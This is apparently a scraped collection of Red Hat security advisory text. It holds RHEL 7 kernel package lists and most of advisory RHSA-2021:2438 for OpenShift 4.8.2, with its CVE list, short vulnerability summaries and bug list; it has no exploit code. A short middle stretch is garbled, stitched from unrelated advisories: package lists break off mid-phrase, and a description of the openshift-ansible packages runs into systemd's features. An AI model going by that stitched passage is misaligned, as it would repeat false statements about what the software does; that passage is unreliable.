7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1160.36.2.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1160.36.2.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1160.36.2.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-devel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-headers-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1160.36.2.el7.s390x.rpm\nperf-3.10.0-1160.36.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\npython-perf-3.10.0-1160.36.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. \nThese packages include redhat-release-virtualization-host. \nRHVH features a Cockpit user interface for monitoring the host\u0027s resources\nand\nperforming administrative tasks. \n\nBug Fix(es):\n\n* xfs umount hangs in xfs_wait_buftarg() due to negative bt_io_count\n(BZ#1949916)\n\n4. \n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nAnsible is a SSH-based configuration management, deployment, and task\nexecution system. The openshift-ansible packages contain Ansible code and\nplaybooks for installing and upgrading OpenShift Container Platform 3. It provides\naggressive parallelism capabilities, uses socket and D-Bus activation for\nstarting services, offers on-demand starting of daemons, and keeps track of\nprocesses using Linux cgroups. In addition, it supports snapshotting and\nrestoring of the system state, maintains mount and automount points, and\nimplements an elaborate transactional dependency-based service control\nlogic. It can also work as a drop-in replacement for sysvinit. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.3.z source tree\n(BZ#1957359)\n\n* Placeholder bug for OCP 4.7.0 rpm release (BZ#1983534)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.8.2 bug fix and security update\nAdvisory ID:       RHSA-2021:2438-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2438\nIssue date:        2021-07-27\nCVE Names:         CVE-2016-2183 CVE-2020-7774 CVE-2020-15106 \n                   CVE-2020-15112 CVE-2020-15113 CVE-2020-15114 \n                   CVE-2020-15136 CVE-2020-26160 CVE-2020-26541 \n                   CVE-2020-28469 CVE-2020-28500 CVE-2020-28852 \n                   CVE-2021-3114 CVE-2021-3121 CVE-2021-3516 \n                   CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 \n                   CVE-2021-3537 CVE-2021-3541 CVE-2021-3636 \n                   CVE-2021-20206 CVE-2021-20271 CVE-2021-20291 \n                   CVE-2021-21419 CVE-2021-21623 CVE-2021-21639 \n                   CVE-2021-21640 CVE-2021-21648 CVE-2021-22133 \n                   CVE-2021-23337 CVE-2021-23362 CVE-2021-23368 \n                   CVE-2021-23382 CVE-2021-25735 CVE-2021-25737 \n                   CVE-2021-26539 CVE-2021-26540 CVE-2021-27292 \n                   CVE-2021-28092 CVE-2021-29059 CVE-2021-29622 \n                   CVE-2021-32399 CVE-2021-33034 CVE-2021-33194 \n                   CVE-2021-33909 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.8.2 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.8.2. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2437\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel\nease-notes.html\n\nSecurity Fix(es):\n\n* SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n(CVE-2016-2183)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* etcd: Large slice causes panic in decodeRecord method (CVE-2020-15106)\n\n* etcd: DoS in wal/wal.go (CVE-2020-15112)\n\n* etcd: directories created via os.MkdirAll are not checked for permissions\n(CVE-2020-15113)\n\n* etcd: gateway can include itself as an endpoint resulting in resource\nexhaustion and leads to DoS (CVE-2020-15114)\n\n* etcd: no authentication is performed against endpoints provided in the\n- --endpoints flag (CVE-2020-15136)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve\n(CVE-2021-3114)\n\n* containernetworking-cni: Arbitrary path injection via type field in CNI\nconfiguration (CVE-2021-20206)\n\n* containers/storage: DoS via malicious image (CVE-2021-20291)\n\n* prometheus: open redirect under the /new endpoint (CVE-2021-29622)\n\n* golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)\n\n* go.elastic.co/apm: leaks sensitive HTTP headers during panic\n(CVE-2021-22133)\n\nSpace precludes listing in detail the following additional CVEs fixes:\n(CVE-2021-27292), (CVE-2021-28092), (CVE-2021-29059), (CVE-2021-23382),\n(CVE-2021-26539), (CVE-2021-26540), (CVE-2021-23337), (CVE-2021-23362) and\n(CVE-2021-23368)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-x86_64\n\nThe image digest is\nssha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-s390x\n\nThe image digest is\nsha256:a284c5c3fa21b06a6a65d82be1dc7e58f378aa280acd38742fb167a26b91ecb5\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-ppc64le\n\nThe image digest is\nsha256:da989b8e28bccadbb535c2b9b7d3597146d14d254895cd35f544774f374cdd0f\n\nAll OpenShift Container Platform 4.8 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1725981 - oc explain does not work well with full resource.group names\n1747270 - [osp] Machine with name \"\u003ccluster-id\u003e-worker\"couldn\u0027t join the cluster\n1772993 - rbd block devices attached to a host are visible in unprivileged container pods\n1786273 - [4.6] KAS pod logs show \"error building openapi models ... has invalid property: anyOf\" for CRDs\n1786314 - [IPI][OSP] Install fails on OpenStack with self-signed certs unless the node running the installer has the CA cert in its system trusts\n1801407 - Router in v4v6 mode puts brackets around IPv4 addresses in the Forwarded header\n1812212 - ArgoCD example application cannot be downloaded from github\n1817954 - [ovirt] Workers nodes are not numbered sequentially\n1824911 - PersistentVolume yaml editor is read-only with system:persistent-volume-provisioner ClusterRole\n1825219 - openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with \"Unable to connect to the server\"\n1825417 - The containerruntimecontroller doesn\u0027t roll back to CR-1 if we delete CR-2\n1834551 - ClusterOperatorDown fires when operator is only degraded; states will block upgrades\n1835264 - Intree provisioner doesn\u0027t respect PVC.spec.dataSource sometimes\n1839101 - Some sidebar links in developer perspective don\u0027t follow same project\n1840881 - The KubeletConfigController cannot process multiple confs for a pool/ pool changes\n1846875 - Network setup test high failure rate\n1848151 - Console continues to poll the ClusterVersion resource when the user doesn\u0027t have authority\n1850060 - After upgrading to 3.11.219 timeouts are appearing. \n1852637 - Kubelet sets incorrect image names in node status images section\n1852743 - Node list CPU column only show usage\n1853467 - container_fs_writes_total is inconsistent with CPU/memory in summarizing cgroup values\n1857008 - [Edge] [BareMetal] Not provided STATE value for machines\n1857477 - Bad helptext for storagecluster creation\n1859382 - check-endpoints panics on graceful shutdown\n1862084 - Inconsistency of time formats in the OpenShift web-console\n1864116 - Cloud credential operator scrolls warnings about unsupported platform\n1866222 - Should output all options when runing `operator-sdk init --help`\n1866318 - [RHOCS Usability Study][Dashboard] Users found it difficult to navigate to the OCS dashboard\n1866322 - [RHOCS Usability Study][Dashboard] Alert details page does not help to explain the Alert\n1866331 - [RHOCS Usability Study][Dashboard] Users need additional tooltips or definitions\n1868755 - [vsphere] terraform provider vsphereprivate crashes when network is unavailable on host\n1868870 - CVE-2020-15113 etcd: directories created via os.MkdirAll are not checked for permissions\n1868872 - CVE-2020-15112 etcd: DoS in wal/wal.go\n1868874 - CVE-2020-15114 etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS\n1868880 - CVE-2020-15136 etcd: no authentication is performed against endpoints provided in the --endpoints flag\n1868883 - CVE-2020-15106 etcd: Large slice causes panic in decodeRecord method\n1871303 - [sig-instrumentation] Prometheus when installed on the cluster should have important platform topology metrics\n1871770 - [IPI baremetal] The Keepalived.conf file is not indented evenly\n1872659 - ClusterAutoscaler doesn\u0027t scale down when a node is not needed anymore\n1873079 - SSH to api and console route is possible when the clsuter is hosted on Openstack\n1873649 - proxy.config.openshift.io should validate user inputs\n1874322 - openshift/oauth-proxy: htpasswd using SHA1 to store credentials\n1874931 - Accessibility - Keyboard shortcut to exit YAML editor not easily discoverable\n1876918 - scheduler test leaves taint behind\n1878199 - Remove Log Level Normalization controller in cluster-config-operator release N+1\n1878655 - [aws-custom-region] creating manifests take too much time when custom endpoint is unreachable\n1878685 - Ingress resource with \"Passthrough\"  annotation does not get applied when using the newer \"networking.k8s.io/v1\" API\n1879077 - Nodes tainted after configuring additional host iface\n1879140 - console auth errors not understandable by customers\n1879182 - switch over to secure access-token logging by default and delete old non-sha256 tokens\n1879184 - CVO must detect or log resource hotloops\n1879495 - [4.6] namespace \\\u201copenshift-user-workload-monitoring\\\u201d does not exist\u201d\n1879638 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string\n1879944 - [OCP 4.8] Slow PV creation with vsphere\n1880757 - AWS: master not removed from LB/target group when machine deleted\n1880758 - Component descriptions in cloud console have bad description (Managed by Terraform)\n1881210 - nodePort for router-default metrics with NodePortService does not exist\n1881481 - CVO hotloops on some service manifests\n1881484 - CVO hotloops on deployment manifests\n1881514 - CVO hotloops on imagestreams from cluster-samples-operator\n1881520 - CVO hotloops on (some) clusterrolebindings\n1881522 - CVO hotloops on clusterserviceversions packageserver\n1881662 - Error getting volume limit for plugin kubernetes.io/\u003cname\u003e in kubelet logs\n1881694 - Evidence of disconnected installs pulling images from the local registry instead of quay.io\n1881938 - migrator deployment doesn\u0027t tolerate masters\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1883587 - No option for user to select volumeMode\n1883993 - Openshift 4.5.8 Deleting pv disk vmdk after delete machine\n1884053 - cluster DNS experiencing disruptions during cluster upgrade in insights cluster\n1884800 - Failed to set up mount unit: Invalid argument\n1885186 - Removing ssh keys MC does not remove the key from authorized_keys\n1885349 - [IPI Baremetal] Proxy Information Not passed to metal3\n1885717 - activeDeadlineSeconds DeadlineExceeded does not show terminated container statuses\n1886572 - auth: error contacting auth provider when extra ingress (not default)  goes down\n1887849 - When creating new storage class failure_domain is missing. \n1888712 - Worker nodes do not come up on a baremetal IPI deployment with control plane network configured on a vlan on top of bond interface due to Pending CSRs\n1889689 - AggregatedAPIErrors alert may never fire\n1890678 - Cypress:  Fix \u0027structure\u0027 accesibility violations\n1890828 - Intermittent prune job failures causing operator degradation\n1891124 - CP Conformance: CRD spec and status failures\n1891301 - Deleting bmh  by \"oc delete bmh\u0027 get stuck\n1891696 - [LSO] Add capacity UI does not check for node present in selected storageclass\n1891766 - [LSO] Min-Max filter\u0027s from OCS wizard accepts Negative values and that cause PV not getting created\n1892642 - oauth-server password metrics do not appear in UI after initial OCP installation\n1892718 - HostAlreadyClaimed: The new route cannot be loaded with a new api group version\n1893850 - Add an alert for requests rejected by the apiserver\n1893999 - can\u0027t login ocp cluster with oc 4.7 client without the username\n1895028 - [gcp-pd-csi-driver-operator] Volumes created by CSI driver are not deleted on cluster deletion\n1895053 - Allow builds to optionally mount in cluster trust stores\n1896226 - recycler-pod template should not be in kubelet static manifests directory\n1896321 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types\n1896751 - [RHV IPI] Worker nodes stuck in the Provisioning Stage if the machineset has a long name\n1897415 - [Bare Metal - Ironic] provide the ability to set the cipher suite for ipmitool when doing a Bare Metal IPI install\n1897621 - Auth test.Login test.logs in as kubeadmin user: Timeout\n1897918 - [oVirt] e2e tests fail due to kube-apiserver not finishing\n1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability\n1899057 - fix spurious br-ex MAC address error log\n1899187 - [Openstack] node-valid-hostname.service failes during the first boot leading to 5 minute provisioning delay\n1899587 - [External] RGW usage metrics shown on Object Service Dashboard  is incorrect\n1900454 - Enable host-based disk encryption on Azure platform\n1900819 - Scaled ingress replicas following sharded pattern don\u0027t balance evenly across multi-AZ\n1901207 - Search Page - Pipeline resources table not immediately updated after Name filter applied or removed\n1901535 - Remove the managingOAuthAPIServer field from the authentication.operator API\n1901648 - \"do you need to set up custom dns\" tooltip inaccurate\n1902003 - Jobs Completions column is not sorting when there are \"0 of 1\" and \"1 of 1\" in the list. \n1902076 - image registry operator should monitor status of its routes\n1902247 - openshift-oauth-apiserver apiserver pod crashloopbackoffs\n1903055 - [OSP] Validation should fail when no any IaaS flavor or type related field are given\n1903228 - Pod stuck in Terminating, runc init process frozen\n1903383 - Latest RHCOS 47.83. builds failing to install: mount /root.squashfs failed\n1903553 - systemd container renders node NotReady after deleting it\n1903700 - metal3 Deployment doesn\u0027t have unique Pod selector\n1904006 - The --dir option doest not work for command  `oc image extract`\n1904505 - Excessive Memory Use in Builds\n1904507 - vsphere-problem-detector: implement missing metrics\n1904558 - Random init-p error when trying to start pod\n1905095 - Images built on OCP 4.6 clusters create manifests that result in quay.io (and other registries) rejecting those manifests\n1905147 - ConsoleQuickStart Card\u0027s prerequisites is a combined text instead of a list\n1905159 - Installation on previous unused dasd fails after formatting\n1905331 - openshift-multus initContainer multus-binary-copy, etc. are not requesting required resources: cpu, memory\n1905460 - Deploy using virtualmedia for disabled provisioning network on real BM(HPE) fails\n1905577 - Control plane machines not adopted when provisioning network is disabled\n1905627 - Warn users when using an unsupported browser such as IE\n1905709 - Machine API deletion does not properly handle stopped instances on AWS or GCP\n1905849 - Default volumesnapshotclass should be created when creating default storageclass\n1906056 - Bundles skipped via the `skips` field cannot be pinned\n1906102 - CBO produces standard metrics\n1906147 - ironic-rhcos-downloader should not use --insecure\n1906304 - Unexpected value NaN parsing x/y attribute when viewing pod Memory/CPU usage chart\n1906740 - [aws]Machine should be \"Failed\" when creating a machine with invalid region\n1907309 - Migrate controlflow v1alpha1 to v1beta1 in storage\n1907315 - the internal load balancer annotation for AWS should use \"true\" instead of \"0.0.0.0/0\" as value\n1907353 - [4.8] OVS daemonset is wasting resources even though it doesn\u0027t do anything\n1907614 - Update kubernetes deps to 1.20\n1908068 - Enable DownwardAPIHugePages feature gate\n1908169 - The example of Import URL is \"Fedora cloud image list\" for all templates. \n1908170 - sriov network resource injector: Hugepage injection doesn\u0027t work with mult container\n1908343 - Input labels in Manage columns modal should be clickable\n1908378 - [sig-network] pods should successfully create sandboxes by getting pod - Static Pod Failures\n1908655 - \"Evaluating rule failed\" for \"record: node:node_num_cpu:sum\" rule\n1908762 - [Dualstack baremetal cluster] multicast traffic is not working on ovn-kubernetes\n1908765 - [SCALE] enable OVN lflow data path groups\n1908774 - [SCALE] enable OVN DB memory trimming on compaction\n1908916 - CNO: turn on OVN DB RAFT diffs once all master DB pods are capable of it\n1909091 - Pod/node/ip/template isn\u0027t showing when vm is running\n1909600 - Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error\n1909849 - release-openshift-origin-installer-e2e-aws-upgrade-fips-4.4 is perm failing\n1909875 - [sig-cluster-lifecycle] Cluster version operator acknowledges upgrade : timed out waiting for cluster to acknowledge upgrade\n1910067 - UPI: openstacksdk fails on \"server group list\"\n1910113 - periodic-ci-openshift-release-master-ocp-4.5-ci-e2e-44-stable-to-45-ci is never passing\n1910318 - OC 4.6.9 Installer failed: Some pods are not scheduled: 3 node(s) didn\u0027t match node selector: AWS compute machines without status\n1910378 - socket timeouts for webservice communication between pods\n1910396 - 4.6.9 cred operator should back-off when provisioning fails on throttling\n1910500 - Could not list CSI provisioner on web when create storage class on GCP platform\n1911211 - Should show the cert-recovery-controller version  correctly\n1911470 - ServiceAccount Registry Authfiles Do Not Contain Entries for Public Hostnames\n1912571 - libvirt: Support setting dnsmasq options through the install config\n1912820 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade\n1913112 - BMC details should be optional for unmanaged hosts\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1913341 - GCP: strange cluster behavior in CI run\n1913399 - switch to v1beta1 for the priority and fairness APIs\n1913525 - Panic in OLM packageserver when invoking webhook authorization endpoint\n1913532 - After a 4.6 to 4.7 upgrade, a node went unready\n1913974 - snapshot test periodically failing with \"can\u0027t open \u0027/mnt/test/data\u0027: No such file or directory\"\n1914127 - Deletion of oc get svc router-default -n openshift-ingress hangs\n1914446 - openshift-service-ca-operator and openshift-service-ca pods run as root\n1914994 - Panic observed in k8s-prometheus-adapter since k8s 1.20\n1915122 - Size of the hostname was preventing proper DNS resolution of the worker node names\n1915693 - Not able to install gpu-operator on cpumanager enabled node. \n1915971 - Role and Role Binding breadcrumbs do not work as expected\n1916116 - the left navigation menu would not be expanded if repeat clicking the links in Overview page\n1916118 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall\n1916392 - scrape priority and fairness endpoints for must-gather\n1916450 - Alertmanager: add title and text fields to Adv. config. section of Slack Receiver form\n1916489 - [sig-scheduling] SchedulerPriorities [Serial] fails with \"Error waiting for 1 pods to be running - probably a timeout: Timeout while waiting for pods with labels to be ready\"\n1916553 - Default template\u0027s description is empty on details tab\n1916593 - Destroy cluster sometimes stuck in a loop\n1916872 - need ability to reconcile exgw annotations on pod add\n1916890 - [OCP 4.7] api or api-int not available during installation\n1917241 - [en_US] The tooltips of Created date time is not easy to read in all most of UIs. \n1917282 - [Migration] MCO stucked for rhel worker after  enable the migration prepare state\n1917328 - It should default to current namespace when create vm from template action on details page\n1917482 - periodic-ci-openshift-release-master-ocp-4.7-e2e-metal-ipi failing with \"cannot go from state \u0027deploy failed\u0027 to state \u0027manageable\u0027\"\n1917485 - [oVirt] ovirt machine/machineset object has missing some field validations\n1917667 - Master machine config pool updates are stalled during the migration from SDN to OVNKube. \n1917906 - [oauth-server] bump k8s.io/apiserver to 1.20.3\n1917931 - [e2e-gcp-upi] failing due to missing pyopenssl library\n1918101 - [vsphere]Delete Provisioning machine took about 12 minutes\n1918376 - Image registry pullthrough does not support ICSP, mirroring e2es do not pass\n1918442 - Service Reject ACL does not work on dualstack\n1918723 - installer fails to write boot record on 4k scsi lun on s390x\n1918729 - Add hide/reveal button for the token field in the KMS configuration page\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n1918785 - Pod request and limit calculations in console are incorrect\n1918910 - Scale from zero annotations should not requeue if instance type missing\n1919032 - oc image extract - will not extract files from image rootdir - \"error: unexpected directory from mapping tests.test\"\n1919048 - Whereabouts IPv6 addresses not calculated when leading hextets equal 0\n1919151 - [Azure] dnsrecords with invalid domain should not be published to Azure 